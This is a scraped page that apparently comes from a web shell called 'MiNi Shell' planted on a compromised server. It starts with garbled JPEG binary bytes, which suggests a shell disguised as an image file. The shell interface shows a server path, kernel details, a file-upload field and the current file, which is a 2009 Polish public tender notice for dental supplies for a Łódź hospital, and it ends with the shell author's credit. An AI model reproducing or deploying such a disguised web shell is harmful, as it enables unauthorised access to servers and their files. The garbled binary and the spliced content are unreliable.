JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/77441-N-2009.html

<p class="kh_header"><b>Łódź: Dostawa materiałów stomatologicznych dla Uniwersyteckiego Szpitala Klinicznego w Łodzi</b><br>
<b>Numer ogłoszenia: 77441 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SPZOZ Uniwersytecki Szpital Kliniczny Nr 2 im. WAM Uniwersytetu Medycznego w Łodzi - Centralny Szpital Weteranów , ul. Żeromskiego 113, 90-549 Łódź, woj. łódzkie, tel. 042 6393452, 6393453, 6393458, faks 042 6393452.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.usk2.umed.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów stomatologicznych dla Uniwersyteckiego Szpitala Klinicznego w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów stomatologicznych dla Uniwersyteckiego Szpitala Klinicznego w Łodzi o wartości szacunkowej nie przekraczającej wyrażonej w złotych równowartości kwoty 133.000 euro, określonej w przepisach wydanych na podstawie art. 11 ust. 8 uPzp, z podziałem na 17 pakietów.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.18.00-8, 33.13.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 48.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 uPzp:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Zamawiający uzna, że Wykonawca spełnia warunek określony w art. 22 ust. 1, pkt. 1 uPzp, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym przedmiotowym zamówieniem.
3.	Zamawiający uzna, że Wykonawca spełnia warunek określony w art. 22 ust. 1, pkt. 2 uPzp, jeżeli w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca należycie wykonał co najmniej dwie dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia, o łącznej wartości nie mniejszej niż 70% ceny oferty (brutto).
4.	Zamawiający uzna, że Wykonawca spełnia warunek określony w art. 22 ust. 1, pkt. 3 uPzp, jeżeli Wykonawca posiada środki finansowe lub zdolność kredytową umożliwiającą realizację przedmiotowego zamówienia - co najmniej 20% ceny oferty. 
5.	Zamawiający uzna, że Wykonawca spełnia warunek określony w art. 22 ust. 1, pkt. 4 uPzp, jeżeli w stosunku do Wykonawcy nie zachodzą przesłanki określone w art. 24 uPzp.
6.	Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach złożonych przez wykonawców. Z załączonych dokumentów musi wynikać jednoznacznie, iż powyższe warunki wykonawca spełnił. Nie spełnienie chociażby jednego z powyższych warunków skutkować będzie wykluczeniem Wykonawcy z udziału w przedmiotowym postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wykonawca zobowiązany jest do złożenia wraz z ofertą (Załącznik nr 1 do SIWZ - Formularz oferty oraz Załącznik nr 2 - Formularz cenowy) następujące dokumenty i oświadczenia:
1.1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.2.	oświadczenie w trybie art. 22 ust. 1  uPzp (Załączniki nr 3 do SIWZ);
1.3.	oświadczenie wykonawcy (załącznik nr 4 do SIWZ) o:
1.3.1.	zrealizowaniu co najmniej dwóch dostaw odpowiadających swoim rodzajem przedmiotowi zamówienia o łącznej wartości nie mniejszej niż 70% ceny oferty;
1.3.2.	posiadaniu środków finansowych lub zdolności kredytowej umożliwiającej wykonanie przedmiotowego zamówienia - co najmniej 20% ceny oferty.
2.	W celu potwierdzenia spełnienia wymagań przez oferowany asortyment, zamawiający wymaga złożenia następujących oświadczeń i dokumentów:
2.1.	aktualnych dokumentów potwierdzających dopuszczenie do obrotu i używania oferowanego asortymentu na rynek polski, zgodnie z Ustawą z dnia 20 kwietnia 2004 roku o wyrobach medycznych (Dz. U. z 2004, Nr 93, poz. 896 ze zm.);
2.2.	informacje (karty katalogowe, prospekty, ulotki) nt. parametrów oferowanego produktu;
2.3.	kart charakterystyki substancji oznaczonych jako niebezpieczne (jeżeli dotyczy)
Z przedłożonych dokumentów winno jednoznacznie wynikać, że oferowany produkt jest zgodny z opisem przedmiotu zamówienia. Prosimy o zaznaczenie na poszczególnych dokumentach, którego pakietu (pozycji) one dotyczą.
3.	Ofertę oraz oświadczenia należy sporządzić na załączonych drukach, lub na własnych z identyczną szatą graficzną i przedłożyć w oryginale.
4.	Dokumenty wymienione w pkt. 1.1. oraz 2 należy złożyć w formie oryginałów lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem.
5.	Wykonawcy, mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zobowiązani są złożyć wymagane przez Zamawiającego dokumenty zgodnie z §2 Rozporządzania Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 87 poz. 605 z 2006 roku z późniejszymi zmianami).
6.	Brak jakiegokolwiek z ww. dokumentów lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie Wykonawcy z postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.usk2.umed.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 10:00, miejsce: Siedziba Zamawiającego - kancelaria ogólna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> amalgamaty w kapsułkach w ilości ok. 39 op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wypełnienie, bond jednoskładnikowy w ilości łącznej ok. 420 op..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> masa silikonowa, katalizator w ilości łącznej ok. 75 op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wiertła w ilości łącznej ok. 12600 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczoteczki w ilości łącznej ok. 750 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kalka stomatologiczna w ilości łącznej ok. 600 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> paski w ilości łącznej ok. 1440 op. (rol).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ślinak stomatologiczny w ilości łącznej ok. 600 op; jednorazowy wkład do spluwaczki w ilości łącznej ok. 600 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> końcówka ślinociągu w ilości łącznej ok. 600 op; kubki w ilości łącznej ok. 1500 op..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lusterko stomatologiczne; rączka do lusterka stomatologicznego; nakładacz stomatologiczny dwustronny; zgłębnik stomatologiczny prostokątny w ilości łącznej ok. 1020 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ćwieki, sączki w ilości łącznej ok. 420 op..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ćwieki w ilości łącznej ok.60 kpl, wkłady w ilości łącznej ok. 150 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> materiał do wypełnień, glasjonomer w ilości łącznej ok. 240 op..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> stomatologiczne leki znieczulające w ilości łącznej ok. 450 op..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> separatory w ilości łącznej ok. 270 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> płyny do dezynfekcji w ilości łącznej ok. 231 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17 - Zamawiający dopuszcza składanie ofert na każdą z poszczególnych pozycji 32 w tym pakiecie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiał do wypełniań ;Podkład na światło ;Materiał podkładowy typu ; Materiał do wybielana zębów ; Wytrawiacz w strzykawce ; Lakier do fluorowania typu ; Materiał do poszerzania kanałów ; Lakiet ; Lakier do pokrycia bruzd ;Materiał do statecznego wypełnienia kanałaów ; Maść stomatologiczna ; Materiał do dezynfekcji kanałów ; Materiał do dewitalizacji miazgi ; Materiał do wypełnień tymczasowych ; Materiał do leczenia miazgi ; Poszerzacz kanałowy a; Poszerzacz Pesso ; Miazgociągi ; Gumki do opracowania wypełnień na kątnice ; Pojemnik na watę  ; Pasta do usuwania nalotu ; Nici retrakcyjne ; Kliny drewniane ; Płytka szklana ; Igła lentullo; Igły do karpuli ; Pędzelki do bondingu ; Wosk modelowy ; Olej ; Knot do palnika ; Masa wyciskowa alginatowa ; System wytrawiająco - wiążący UWAGA! Zamawiający dopuszcza składanie ofert na poszczególne pozycje w tym pakiecie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.14.18.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com